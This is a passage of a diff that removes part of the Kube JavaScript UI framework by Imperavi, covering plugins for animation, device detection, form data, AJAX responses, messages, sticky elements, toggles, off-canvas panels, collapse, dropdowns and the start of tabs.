-    Kube.Animation.inherits(Kube);
-
-}(Kube));
-
-// Plugin
-(function($)
-{
-    $.fn.animation = function(effect, callback)
-    {
-        var name = 'fn.animation';
-
-        return this.each(function()
-        {
-            var $this = $(this), data = $this.data(name);
-
-            $this.data(name, {});
-            $this.data(name, (data = new Kube.Animation(this, effect, callback)));
-        });
-    };
-
-    $.fn.animation.options = {};
-
-})(jQuery);
-/**
- * @library Kube Detect
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Detect = function() {};
-
-    Kube.Detect.prototype = {
-    	isMobile: function()
-    	{
-    		return /(iPhone|iPod|BlackBerry|Android)/.test(navigator.userAgent);
-    	},
-    	isDesktop: function()
-    	{
-    		return !/(iPhone|iPod|iPad|BlackBerry|Android)/.test(navigator.userAgent);
-    	},
-    	isMobileScreen: function()
-    	{
-    		return ($(window).width() <= 768);
-    	},
-    	isTabletScreen: function()
-    	{
-    		return ($(window).width() >= 768 && $(window).width() <= 1024);
-    	},
-    	isDesktopScreen: function()
-    	{
-    		return ($(window).width() > 1024);
-    	}
-    };
-
-
-}(Kube));
-/**
- * @library Kube FormData
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.FormData = function(app)
-    {
-        this.opts = app.opts;
-    };
-
-    Kube.FormData.prototype = {
-        set: function(data)
-        {
-            this.data = data;
-        },
-        get: function(formdata)
-    	{
-        	this.formdata = formdata;
-
-            if (this.opts.appendForms) this.appendForms();
-            if (this.opts.appendFields) this.appendFields();
-
-            return this.data;
-    	},
-    	appendFields: function()
-    	{
-    		var $fields = $(this.opts.appendFields);
-    		if ($fields.length === 0)
-    		{
-        		return;
-            }
-
-    		var self = this;
-            var str = '';
-
-            if (this.formdata)
-            {
-                $fields.each(function()
-    			{
-    				self.data.append($(this).attr('name'), $(this).val());
-    			});
-            }
-            else
-            {
-    			$fields.each(function()
-    			{
-    				str += '&' + $(this).attr('name') + '=' + $(this).val();
-    			});
-
-    			this.data = (this.data === '') ? str.replace(/^&/, '') : this.data + str;
-            }
-    	},
-    	appendForms: function()
-    	{
-    		var $forms = $(this.opts.appendForms);
-    		if ($forms.length === 0)
-    		{
-    			return;
-    		}
-
-            if (this.formdata)
-            {
-                var self = this;
-                var formsData = $(this.opts.appendForms).serializeArray();
-                $.each(formsData, function(i,s)
-                {
-                	self.data.append(s.name, s.value);
-                });
-            }
-            else
-            {
-                var str = $forms.serialize();
-
-                this.data = (this.data === '') ? str : this.data + '&' + str;
-            }
-    	}
-    };
-
-
-}(Kube));
-/**
- * @library Kube Response
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Response = function(app) {};
-
-    Kube.Response.prototype = {
-        parse: function(str)
-    	{
-        	if (str === '') return false;
-
-    		var obj = {};
-
-    		try {
-    			obj = JSON.parse(str);
-    		} catch (e) {
-    			return false;
-    		}
-
-    		if (obj[0] !== undefined)
-    		{
-    			for (var item in obj)
-    			{
-    				this.parseItem(obj[item]);
-    			}
-    		}
-    		else
-    		{
-    			this.parseItem(obj);
-    		}
-
-    		return obj;
-    	},
-    	parseItem: function(item)
-    	{
-    		if (item.type === 'value')
-    		{
-    			$.each(item.data, $.proxy(function(key, val)
-    			{
-        			val = (val === null || val === false) ? 0 : val;
-        			val = (val === true) ? 1 : val;
-
-    				$(key).val(val);
-
-    			}, this));
-    		}
-    		else if (item.type === 'html')
-    		{
-    			$.each(item.data, $.proxy(function(key, val)
-    			{
-        			val = (val === null || val === false) ? '' : val;
-
-    				$(key).html(this.stripslashes(val));
-
-    			}, this));
-    		}
-    		else if (item.type === 'addClass')
-    		{
-    			$.each(item.data, function(key, val)
-    			{
-    				$(key).addClass(val);
-    			});
-            }
-    		else if (item.type === 'removeClass')
-    		{
-    			$.each(item.data, function(key, val)
-    			{
-    				$(key).removeClass(val);
-    			});
-            }
-    		else if (item.type === 'command')
-    		{
-    			$.each(item.data, function(key, val)
-    			{
-    				$(val)[key]();
-    			});
-    		}
-    		else if (item.type === 'animation')
-    		{
-    			$.each(item.data, function(key, data)
-    			{
-    				data.opts = (typeof data.opts === 'undefined') ? {} : data.opts;
-
-    				$(key).animation(data.name, data.opts);
-    			});
-    		}
-    		else if (item.type === 'location')
-    		{
-    			top.location.href = item.data;
-    		}
-    		else if (item.type === 'notify')
-    		{
-    			$.notify(item.data);
-    		}
-
-    		return item;
-    	},
-        stripslashes: function(str)
-    	{
-    		return (str+'').replace(/\0/g, '0').replace(/\\([\\'"])/g, '$1');
-        }
-    };
-
-
-}(Kube));
-/**
- * @library Kube Utils
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Utils = function() {};
-
-    Kube.Utils.prototype = {
-        disableBodyScroll: function()
-    	{
-    		var $body = $('html');
-    		var windowWidth = window.innerWidth;
-
-    		if (!windowWidth)
-    		{
-    			var documentElementRect = document.documentElement.getBoundingClientRect();
-    			windowWidth = documentElementRect.right - Math.abs(documentElementRect.left);
-    		}
-
-    		var isOverflowing = document.body.clientWidth < windowWidth;
-    		var scrollbarWidth = this.measureScrollbar();
-
-    		$body.css('overflow', 'hidden');
-    		if (isOverflowing) $body.css('padding-right', scrollbarWidth);
-    	},
-    	measureScrollbar: function()
-    	{
-    		var $body = $('body');
-    		var scrollDiv = document.createElement('div');
-    		scrollDiv.className = 'scrollbar-measure';
-
-    		$body.append(scrollDiv);
-    		var scrollbarWidth = scrollDiv.offsetWidth - scrollDiv.clientWidth;
-    		$body[0].removeChild(scrollDiv);
-    		return scrollbarWidth;
-    	},
-    	enableBodyScroll: function()
-    	{
-    		$('html').css({ 'overflow': '', 'padding-right': '' });
-    	}
-    };
-
-
-}(Kube));
-/**
- * @library Kube Message
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Message = function(element, options)
-    {
-        this.namespace = 'message';
-        this.defaults = {
-            closeSelector: '.close',
-            closeEvent: 'click',
-            animationOpen: 'fadeIn',
-            animationClose: 'fadeOut',
-            callbacks: ['open', 'opened', 'close', 'closed']
-        };
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Initialization
-        this.start();
-    };
-
-    // Functionality
-    Kube.Message.prototype = {
-        start: function()
-        {
-            this.$close = this.$element.find(this.opts.closeSelector);
-            this.$close.on(this.opts.closeEvent + '.' + this.namespace, $.proxy(this.close, this));
-            this.$element.addClass('open');
-        },
-        stop: function()
-        {
-            this.$close.off('.' + this.namespace);
-            this.$element.removeClass('open');
-        },
-        open: function(e)
-        {
-            if (e) e.preventDefault();
-
-            if (!this.isOpened())
-            {
-                this.callback('open');
-                this.$element.animation(this.opts.animationOpen, $.proxy(this.onOpened, this));
-            }
-        },
-        isOpened: function()
-        {
-            return this.$element.hasClass('open');
-        },
-        onOpened: function()
-        {
-            this.callback('opened');
-            this.$element.addClass('open');
-        },
-        close: function(e)
-        {
-            if (e) e.preventDefault();
-
-            if (this.isOpened())
-            {
-                this.callback('close');
-                this.$element.animation(this.opts.animationClose, $.proxy(this.onClosed, this));
-            }
-        },
-        onClosed: function()
-        {
-            this.callback('closed');
-            this.$element.removeClass('open');
-        }
-    };
-
-    // Inheritance
-    Kube.Message.inherits(Kube);
-
-    // Plugin
-    Kube.Plugin.create('Message');
-    Kube.Plugin.autoload('Message');
-
-}(Kube));
-/**
- * @library Kube Sticky
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Sticky = function(element, options)
-    {
-        this.namespace = 'sticky';
-        this.defaults = {
-            classname: 'fixed',
-            offset: 0, // pixels
-            callbacks: ['fixed', 'unfixed']
-        };
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Initialization
-        this.start();
-    };
-
-    // Functionality
-    Kube.Sticky.prototype = {
-        start: function()
-        {
-    	    this.offsetTop = this.getOffsetTop();
-
-    	    this.load();
-    	    $(window).scroll($.proxy(this.load, this));
-    	},
-    	getOffsetTop: function()
-    	{
-        	return this.$element.offset().top;
-    	},
-    	load: function()
-    	{
-    		return (this.isFix()) ? this.fixed() : this.unfixed();
-    	},
-    	isFix: function()
-    	{
-            return ($(window).scrollTop() > (this.offsetTop + this.opts.offset));
-    	},
-    	fixed: function()
-    	{
-    		this.$element.addClass(this.opts.classname).css('top', this.opts.offset + 'px');
-    		this.callback('fixed');
-    	},
-    	unfixed: function()
-    	{
-    		this.$element.removeClass(this.opts.classname).css('top', '');
-    		this.callback('unfixed');
-        }
-    };
-
-    // Inheritance
-    Kube.Sticky.inherits(Kube);
-
-    // Plugin
-    Kube.Plugin.create('Sticky');
-    Kube.Plugin.autoload('Sticky');
-
-}(Kube));
-/**
- * @library Kube Toggleme
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Toggleme = function(element, options)
-    {
-        this.namespace = 'toggleme';
-        this.defaults = {
-            toggleEvent: 'click',
-            target: null,
-            text: '',
-            animationOpen: 'slideDown',
-            animationClose: 'slideUp',
-            callbacks: ['open', 'opened', 'close', 'closed']
-        };
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Initialization
-        this.start();
-    };
-
-    // Functionality
-    Kube.Toggleme.prototype = {
-        start: function()
-        {
-            if (!this.hasTarget()) return;
-
-            this.$element.on(this.opts.toggleEvent + '.' + this.namespace, $.proxy(this.toggle, this));
-        },
-        stop: function()
-        {
-            this.$element.off('.' + this.namespace);
-            this.revertText();
-        },
-        toggle: function(e)
-        {
-            if (this.isOpened()) this.close(e);
-            else                 this.open(e);
-        },
-        open: function(e)
-        {
-            if (e) e.preventDefault();
-
-            if (!this.isOpened())
-            {
-                this.storeText();
-                this.callback('open');
-                this.$target.animation('slideDown', $.proxy(this.onOpened, this));
-
-                // changes the text of $element with a less delay to smooth
-                setTimeout($.proxy(this.replaceText, this), 100);
-    		}
-        },
-        close: function(e)
-        {
-            if (e) e.preventDefault();
-
-            if (this.isOpened())
-            {
-                this.callback('close');
-                this.$target.animation('slideUp', $.proxy(this.onClosed, this));
-    		}
-        },
-    	isOpened: function()
-        {
-            return (this.$target.hasClass('open'));
-        },
-        onOpened: function()
-        {
-            this.$target.addClass('open');
-         	this.callback('opened');
-        },
-        onClosed: function()
-        {
-            this.$target.removeClass('open');
-            this.revertText();
-        	this.callback('closed');
-        },
-        storeText: function()
-        {
-            this.$element.data('replacement-text', this.$element.html());
-        },
-        revertText: function()
-        {
-            var text = this.$element.data('replacement-text');
-            if (text) this.$element.html(text);
-
-            this.$element.removeData('replacement-text');
-        },
-        replaceText: function()
-        {
-            if (this.opts.text !== '')
-            {
-                this.$element.html(this.opts.text);
-            }
-        }
-    };
-
-    // Inheritance
-    Kube.Toggleme.inherits(Kube);
-
-    // Plugin
-    Kube.Plugin.create('Toggleme');
-    Kube.Plugin.autoload('Toggleme');
-
-}(Kube));
-/**
- * @library Kube Offcanvas
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Offcanvas = function(element, options)
-    {
-        this.namespace = 'offcanvas';
-        this.defaults = {
-    		target: null, // selector
-    		push: true, // boolean
-    		width: '250px', // string
-    		direction: 'left', // string: left or right
-    		toggleEvent: 'click',
-    		clickOutside: true, // boolean
-    		animationOpen: 'slideInLeft',
-    		animationClose: 'slideOutLeft',
-    		callbacks: ['open', 'opened', 'close', 'closed']
-        };
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Services
-        this.utils = new Kube.Utils();
-        this.detect = new Kube.Detect();
-
-        // Initialization
-        this.start();
-    };
-
-    // Functionality
-    Kube.Offcanvas.prototype = {
-        start: function()
-        {
-            if (!this.hasTarget()) return;
-
-            this.buildTargetWidth();
-            this.buildAnimationDirection();
-
-            this.$close = this.getCloseLink();
-            this.$element.on(this.opts.toggleEvent + '.' + this.namespace, $.proxy(this.toggle, this));
-            this.$target.addClass('offcanvas');
-    	},
-    	stop: function()
-    	{
-        	this.closeAll();
-
-            this.$element.off('.' + this.namespace);
-            this.$close.off('.' + this.namespace);
-            $(document).off('.' + this.namespace);
-    	},
-    	toggle: function(e)
-    	{
-        	if (this.isOpened()) this.close(e);
-        	else                 this.open(e);
-        },
-    	buildTargetWidth: function()
-    	{
-            this.opts.width = ($(window).width() < parseInt(this.opts.width)) ? '100%' : this.opts.width;
-    	},
-    	buildAnimationDirection: function()
-    	{
-            if (this.opts.direction === 'right')
-            {
-                this.opts.animationOpen = 'slideInRight';
-    			this.opts.animationClose = 'slideOutRight';
-            }
-    	},
-    	getCloseLink: function()
-    	{
-            return this.$target.find('.close');
-    	},
-    	open: function(e)
-    	{
-        	if (e) e.preventDefault();
-
-            if (!this.isOpened())
-            {
-                this.closeAll();
-        		this.callback('open');
-
-                this.$target.addClass('offcanvas-' + this.opts.direction);
-                this.$target.css('width', this.opts.width);
-
-                this.pushBody();
-
-        		this.$target.animation(this.opts.animationOpen, $.proxy(this.onOpened, this));
-    		}
-    	},
-    	closeAll: function()
-    	{
-    		var $elms = $(document).find('.offcanvas');
-    		if ($elms.length !== 0)
-    		{
-                $elms.each(function()
-                {
-                    var $el = $(this);
-
-                    if ($el.hasClass('open'))
-                    {
-                        $el.css('width', '').animation('hide');
-                        $el.removeClass('open offcanvas-left offcanvas-right');
-                    }
-
-                });
-
-                $(document).off('.' + this.namespace);
-                $('body').css('left', '');
-    		}
-    	},
-    	close: function(e)
-    	{
-        	if (e)
-        	{
-            	var $el = $(e.target);
-            	var isTag = ($el[0].tagName === 'A' || $el[0].tagName === 'BUTTON');
-            	if (isTag && $el.closest('.offcanvas').length !== 0 && !$el.hasClass('close'))
-            	{
-                	return;
-            	}
-
-            	e.preventDefault();
-            }
-
-            if (this.isOpened())
-        	{
-        		this.utils.enableBodyScroll();
-        		this.callback('close');
-                this.pullBody();
-        		this.$target.animation(this.opts.animationClose, $.proxy(this.onClosed, this));
-    		}
-    	},
-    	isOpened: function()
-        {
-            return (this.$target.hasClass('open'));
-        },
-    	onOpened: function()
-    	{
-    		if (this.opts.clickOutside) $(document).on('click.' + this.namespace, $.proxy(this.close, this));
-    		if (this.detect.isMobileScreen()) $('html').addClass('no-scroll');
-
-            $(document).on('keyup.' + this.namespace, $.proxy(this.handleKeyboard, this));
-            this.$close.on('click.' + this.namespace, $.proxy(this.close, this));
-
-    		this.utils.disableBodyScroll();
-            this.$target.addClass('open');
-            this.callback('opened');
-    	},
-    	onClosed: function()
-    	{
-    		if (this.detect.isMobileScreen()) $('html').removeClass('no-scroll');
-
-            this.$target.css('width', '').removeClass('offcanvas-' + this.opts.direction);
-
-            this.$close.off('.' + this.namespace);
-    		$(document).off('.' + this.namespace);
-
-            this.$target.removeClass('open');
-    		this.callback('closed');
-    	},
-    	handleKeyboard: function(e)
-    	{
-    		if (e.which === 27) this.close();
-    	},
-    	pullBody: function()
-    	{
-            if (this.opts.push)
-            {
-                $('body').animate({ left: 0 }, 350, function() { $(this).removeClass('offcanvas-push-body'); });
-            }
-    	},
-    	pushBody: function()
-    	{
-            if (this.opts.push)
-            {
-                var properties = (this.opts.direction === 'left') ? { 'left': this.opts.width } : { 'left': '-' + this.opts.width };
-                $('body').addClass('offcanvas-push-body').animate(properties, 200);
-            }
-    	}
-    };
-
-    // Inheritance
-    Kube.Offcanvas.inherits(Kube);
-
-    // Plugin
-    Kube.Plugin.create('Offcanvas');
-    Kube.Plugin.autoload('Offcanvas');
-
-}(Kube));
-/**
- * @library Kube Collapse
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Collapse = function(element, options)
-    {
-        this.namespace = 'collapse';
-        this.defaults = {
-            target: null,
-            toggle: true,
-            active: false, // string (hash = tab id selector)
-            toggleClass: 'collapse-toggle',
-            boxClass: 'collapse-box',
-            callbacks: ['open', 'opened', 'close', 'closed'],
-
-            // private
-            hashes: [],
-        	currentHash: false,
-        	currentItem: false
-        };
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Initialization
-        this.start();
-    };
-
-    // Functionality
-    Kube.Collapse.prototype = {
-        start: function()
-        {
-            // items
-            this.$items = this.getItems();
-            this.$items.each($.proxy(this.loadItems, this));
-
-            // boxes
-            this.$boxes = this.getBoxes();
-
-            // active
-            this.setActiveItem();
-        },
-        getItems: function()
-        {
-            return this.$element.find('.' + this.opts.toggleClass);
-        },
-        getBoxes: function()
-        {
-            return this.$element.find('.' + this.opts.boxClass);
-        },
-    	loadItems: function(i, el)
-    	{
-    		var item = this.getItem(el);
-
-    		// set item identificator
-    		item.$el.attr('rel', item.hash);
-
-            // active
-    		if (!$(item.hash).hasClass('hide'))
-    		{
-    			this.opts.currentItem = item;
-    			this.opts.active = item.hash;
-
-                item.$el.addClass('active');
-            }
-
-    		// event
-    		item.$el.on('click.collapse', $.proxy(this.toggle, this));
-
-    	},
-    	setActiveItem: function()
-    	{
-    		if (this.opts.active !== false)
-    		{
-    			this.opts.currentItem = this.getItemBy(this.opts.active);
-    			this.opts.active = this.opts.currentItem.hash;
-    		}
-
-            if (this.opts.currentItem !== false)
-            {
-    		    this.addActive(this.opts.currentItem);
-    		    this.opts.currentItem.$box.removeClass('hide');
-    		}
-    	},
-    	addActive: function(item)
-    	{
-    		item.$box.removeClass('hide').addClass('open');
-    		item.$el.addClass('active');
-
-    		if (item.$caret !== false) item.$caret.removeClass('down').addClass('up');
-    		if (item.$parent !== false) item.$parent.addClass('active');
-
-    		this.opts.currentItem = item;
-    	},
-    	removeActive: function(item)
-    	{
-    		item.$box.removeClass('open');
-    		item.$el.removeClass('active');
-
-    		if (item.$caret !== false) item.$caret.addClass('down').removeClass('up');
-    		if (item.$parent !== false) item.$parent.removeClass('active');
-
-    		this.opts.currentItem = false;
-    	},
-        toggle: function(e)
-        {
-            if (e) e.preventDefault();
-
-            var target = $(e.target).closest('.' + this.opts.toggleClass).get(0) || e.target;
-            var item = this.getItem(target);
-
-            if (this.isOpened(item.hash)) this.close(item.hash);
-            else                          this.open(e)
-        },
-        openAll: function()
-        {
-            this.$items.addClass('active');
-            this.$boxes.addClass('open').removeClass('hide');
-        },
-        open: function(e, push)
-        {
-        	if (typeof e === 'undefined') return;
-    		if (typeof e === 'object') e.preventDefault();
-
-            var target = $(e.target).closest('.' + this.opts.toggleClass).get(0) || e.target;
-    		var item = (typeof e === 'object') ? this.getItem(target) : this.getItemBy(e);
-
-    		if (item.$box.hasClass('open'))
-    		{
-        		return;
-    		}
-
-    		if (this.opts.toggle) this.closeAll();
-
-    		this.callback('open', item);
-    		this.addActive(item);
-
-            item.$box.animation('slideDown', $.proxy(this.onOpened, this));
-        },
-        onOpened: function()
-        {
-    		this.callback('opened', this.opts.currentItem);
-        },
-        closeAll: function()
-        {
-            this.$items.removeClass('active').closest('li').removeClass('active');
-            this.$boxes.removeClass('open').addClass('hide');
-        },
-        close: function(num)
-        {
-    		var item = this.getItemBy(num);
-
-    		this.callback('close', item);
-
-    		this.opts.currentItem = item;
-
-    		item.$box.animation('slideUp', $.proxy(this.onClosed, this));
-        },
-        onClosed: function()
-        {
-            var item = this.opts.currentItem;
-
-    		this.removeActive(item);
-    		this.callback('closed', item);
-        },
-        isOpened: function(hash)
-        {
-            return $(hash).hasClass('open');
-        },
-    	getItem: function(element)
-    	{
-    		var item = {};
-
-    		item.$el = $(element);
-    		item.hash = item.$el.attr('href');
-    		item.$box = $(item.hash);
-
-    		var $parent = item.$el.parent();
-    		item.$parent = ($parent[0].tagName === 'LI') ? $parent : false;
-
-    		var $caret = item.$el.find('.caret');
-    		item.$caret = ($caret.length !== 0) ? $caret : false;
-
-    		return item;
-    	},
-    	getItemBy: function(num)
-    	{
-    		var element = (typeof num === 'number') ? this.$items.eq(num-1) : this.$element.find('[rel="' + num + '"]');
-
-    		return this.getItem(element);
-        }
-    };
-
-    // Inheritance
-    Kube.Collapse.inherits(Kube);
-
-    // Plugin
-    Kube.Plugin.create('Collapse');
-    Kube.Plugin.autoload('Collapse');
-
-}(Kube));
-/**
- * @library Kube Dropdown
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Dropdown = function(element, options)
-    {
-        this.namespace = 'dropdown';
-        this.defaults = {
-    		target: null,
-    		toggleEvent: 'click',
-    		height: false, // integer
-    		width: false, // integer
-    		animationOpen: 'slideDown',
-        	animationClose: 'slideUp',
-    		caretUp: false,
-            callbacks: ['open', 'opened', 'close', 'closed']
-        };
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Services
-        this.utils = new Kube.Utils();
-        this.detect = new Kube.Detect();
-
-        // Initialization
-        this.start();
-    };
-
-    // Functionality
-    Kube.Dropdown.prototype = {
-        start: function()
-        {
-            this.buildClose();
-            this.buildCaret();
-
-            if (this.detect.isMobile()) this.buildMobileAnimation();
-
-            this.$target.addClass('hide');
-            this.$element.on(this.opts.toggleEvent + '.' + this.namespace, $.proxy(this.toggle, this));
-
-    	},
-    	stop: function()
-    	{
-        	this.$element.off('.' + this.namespace);
-            this.$target.removeClass('open').addClass('hide');
-    		this.disableEvents();
-    	},
-    	buildMobileAnimation: function()
-    	{
-            this.opts.animationOpen = 'fadeIn';
-            this.opts.animationClose = 'fadeOut';
-    	},
-    	buildClose: function()
-    	{
-            this.$close = this.$target.find('.close');
-    	},
-    	buildCaret: function()
-    	{
-            this.$caret = this.getCaret();
-    		this.buildCaretPosition();
-    	},
-    	buildCaretPosition: function()
-    	{
-    		var height = this.$element.offset().top + this.$element.innerHeight() + this.$target.innerHeight();
-
-    		if ($(document).height() > height)
-    		{
-    			return;
-    		}
-
-            this.opts.caretUp = true;
-    		this.$caret.addClass('up');
-    	},
-    	getCaret: function()
-    	{
-        	return this.$element.find('.caret');
-    	},
-    	toggleCaretOpen: function()
-    	{
-    		if (this.opts.caretUp) this.$caret.removeClass('up').addClass('down');
-    		else                   this.$caret.removeClass('down').addClass('up');
-    	},
-    	toggleCaretClose: function()
-    	{
-    		if (this.opts.caretUp) this.$caret.removeClass('down').addClass('up');
-    		else                   this.$caret.removeClass('up').addClass('down');
-    	},
-    	toggle: function(e)
-    	{
-        	if (this.isOpened()) this.close(e);
-        	else                 this.open(e);
-    	},
-    	open: function(e)
-    	{
-        	if (e) e.preventDefault();
-
-            this.callback('open');
-    		$('.dropdown').removeClass('open').addClass('hide');
-
-    		if (this.opts.height) this.$target.css('min-height', this.opts.height + 'px');
-    		if (this.opts.width)  this.$target.width(this.opts.width);
-
-    		this.setPosition();
-    		this.toggleCaretOpen();
-
-    		this.$target.animation(this.opts.animationOpen, $.proxy(this.onOpened, this));
-    	},
-    	close: function(e)
-    	{
-            if (!this.isOpened())
-    		{
-    			return;
-    		}
-
-    		if (e)
-    		{
-    			if (this.shouldNotBeClosed(e.target))
-    			{
-    				return;
-    			}
-
-    			e.preventDefault();
-    		}
-
-    		this.utils.enableBodyScroll();
-    		this.callback('close');
-    		this.toggleCaretClose();
-
-    		this.$target.animation(this.opts.animationClose, $.proxy(this.onClosed, this));
-    	},
-    	onClosed: function()
-    	{
-            this.$target.removeClass('open');
-    		this.disableEvents();
-    		this.callback('closed');
-    	},
-    	onOpened: function()
-    	{
-    		this.$target.addClass('open');
-    		this.enableEvents();
-    		this.callback('opened');
-    	},
-    	isOpened: function()
-    	{
-        	return (this.$target.hasClass('open'));
-    	},
-    	enableEvents: function()
-    	{
-    		if (this.detect.isDesktop())
-    		{
-    			this.$target.on('mouseover.' + this.namespace, $.proxy(this.utils.disableBodyScroll, this.utils))
-    			            .on('mouseout.' + this.namespace,  $.proxy(this.utils.enableBodyScroll, this.utils));
-    		}
-
-    		$(document).on('scroll.' + this.namespace, $.proxy(this.setPosition, this));
-    		$(window).on('resize.' + this.namespace, $.proxy(this.setPosition, this));
-     		$(document).on('click.' + this.namespace + ' touchstart.' + this.namespace, $.proxy(this.close, this));
-    		$(document).on('keydown.' + this.namespace, $.proxy(this.handleKeyboard, this));
-    		this.$target.find('[data-action="dropdown-close"]').on('click.' + this.namespace, $.proxy(this.close, this));
-    	},
-    	disableEvents: function()
-    	{
-    		this.$target.off('.' + this.namespace);
-    		$(document).off('.' + this.namespace);
-    		$(window).off('.' + this.namespace);
-    	},
-    	handleKeyboard: function(e)
-    	{
-    		if (e.which === 27) this.close(e);
-    	},
-    	shouldNotBeClosed: function(el)
-    	{
-            if ($(el).attr('data-action') === 'dropdown-close' || el === this.$close[0])
-            {
-                return false;
-        	}
-        	else if ($(el).closest('.dropdown').length === 0)
-        	{
-            	return false;
-        	}
-
-        	return true;
-    	},
-        isNavigationFixed: function()
-    	{
-        	return (this.$element.closest('.fixed').length !== 0);
-      	},
-    	getPlacement: function(height)
-    	{
-    		return ($(document).height() < height) ? 'top' : 'bottom';
-    	},
-    	getOffset: function(position)
-    	{
-    		return (this.isNavigationFixed()) ? this.$element.position() : this.$element.offset();
-    	},
-    	getPosition: function()
-    	{
-    		return (this.isNavigationFixed()) ? 'fixed' : 'absolute';
-    	},
-    	setPosition: function()
-    	{
-    		if (this.detect.isMobile())
-    		{
-                this.$target.addClass('dropdown-mobile');
-                return;
-    		}
-
-    		var position = this.getPosition();
-			var coords = this.getOffset(position);
-			var height = this.$target.innerHeight();
-			var width = this.$target.innerWidth();
-			var placement = this.getPlacement(coords.top + height + this.$element.innerHeight());
-			var leftFix = ($(window).width() < (coords.left + width)) ? (width - this.$element.innerWidth()) : 0;
-			var top, left = coords.left - leftFix;
-
-			if (placement === 'bottom')
-			{
-    			if (!this.isOpened()) this.$caret.removeClass('up').addClass('down');
-
-				this.opts.caretUp = false;
-				top = coords.top + this.$element.outerHeight() + 1;
-			}
-			else
-			{
-				this.opts.animationOpen = 'show';
-				this.opts.animationClose = 'hide';
-
-                if (!this.isOpened()) this.$caret.addClass('up').removeClass('down');
-
-				this.opts.caretUp = true;
-				top = coords.top - height - 1;
-			}
-
-			this.$target.css({ position: position, top: top + 'px', left: left + 'px' });
-    	}
-    };
-
-    // Inheritance
-    Kube.Dropdown.inherits(Kube);
-
-    // Plugin
-    Kube.Plugin.create('Dropdown');
-    Kube.Plugin.autoload('Dropdown');
-
-}(Kube));
-/**
- * @library Kube Tabs
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Tabs = function(element, options)
-    {
-        this.namespace = 'tabs';
-        this.defaults = {
-    		equals: false,
-    		active: false, // string (hash = tab id selector)
-    		live: false, // class selector
-    		hash: true, //boolean
-    		callbacks: ['init', 'next', 'prev', 'open', 'opened', 'close', 'closed']
-        };
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Initialization
-        this.start();
-    };
-
-    // Functionality
-    Kube.Tabs.prototype = {
-        start: function()
-        {
-            if (this.opts.live !== false) this.buildLiveTabs();
-
-            this.tabsCollection = [];
-            this.hashesCollection = [];
-            this.currentHash = [];
-            this.currentItem = false;
-
-            // items
-            this.$items = this.getItems();
-            this.$items.each($.proxy(this.loadItems, this));
-
-            // tabs
-    		this.$tabs = this.getTabs();
-
-            // location hash
-    		this.currentHash = this.getLocationHash();
-
-    		// close all
-    		this.closeAll();
-
-            // active & height
-    		this.setActiveItem();
-    		this.setItemHeight();
-
-            // callback
-    		this.callback('init');
-
-    	},
-    	getTabs: function()
-    	{
-        	return $(this.tabsCollection).map(function()
-        	{
-            	return this.toArray();
-            });
-    	},
-    	getItems: function()
-    	{
-    		return this.$element.find('a');
-    	},
-    	loadItems: function(i, el)
-    	{
-    		var item = this.getItem(el);
-
-    		// set item identificator
-    		item.$el.attr('rel', item.hash);
-
-    		// collect item
-            this.collectItem(item);
-
-            // active
-    		if (item.$parent.hasClass('active'))
-    		{
-    			this.currentItem = item;
-    			this.opts.active = item.hash;
-    		}
-
-    		// event
-    		item.$el.on('click.tabs', $.proxy(this.open, this));
-
-    	},
-    	collectItem: function(item)
-    	{
-    		this.tabsCollection.push(item.$tab);
-    		this.hashesCollection.push(item.hash);
-    	},
-    	buildLiveTabs: function()
-    	{
-    		var $layers = $(this.opts.live);
-
-    		if ($layers.length === 0)
-    		{
-    			return;
-    		}
-
-    		this.$liveTabsList = $('<ul />');
-    		$layers.each($.proxy(this.buildLiveItem, this));
-
-    		this.$element.html('').append(this.$liveTabsList);
-
-    	},
-    	buildLiveItem: function(i, tab)
-    	{
-    		var $tab = $(tab);
-    		var $li = $('<li />');
-    		var $a = $('<a />');
-    		var index = i + 1;
-
-    		$tab.attr('id', this.getLiveItemId($tab, index));
-
-    		var hash = '#' + $tab.attr('id');
-    		var title = this.getLiveItemTitle($tab);
-
-    		$a.attr('href', hash).attr('rel', hash).text(title);
-    		$li.append($a);
-
-    		this.$liveTabsList.append($li);
-    	},
-    	getLiveItemId: function($tab, index)
-    	{
-        	return (typeof $tab.attr('id') === 'undefined') ? this.opts.live.replace('.', '') + index : $tab.attr('id');
-    	},
-    	getLiveItemTitle: function($tab)
-    	{
-        	return (typeof $tab.attr('data-title') === 'undefined') ? $tab.attr('id') : $tab.attr('data-title');
-    	},
-    	setActiveItem: function()
-    	{
-    		if (this.currentHash)
-    		{
-    			this.currentItem = this.getItemBy(this.currentHash);
-    			this.opts.active = this.currentHash;
-    		}
-    		else if (this.opts.active === false)
-    		{
-    			this.currentItem = this.getItem(this.$items.first());
-    			this.opts.active = this.currentItem.hash;
-    		}
-
-    		this.addActive(this.currentItem);
-    	},
-    	addActive: function(item)
-    	{
-    		item.$parent.addClass('active');
-    		item.$tab.removeClass('hide').addClass('open');
-
-    		this.currentItem = item;
-    	},
-    	removeActive: function(item)
-    	{
-    		item.$parent.removeClass('active');
-    		item.$tab.addClass('hide').removeClass('open');
-
-    		this.currentItem = false;
-    	},
-    	next: function(e)
-    	{
-    		if (e) e.preventDefault();
-
-    		var item = this.getItem(this.fetchElement('next'));
-
-    		this.open(item.hash);
-    		this.callback('next', item);
-
-    	},
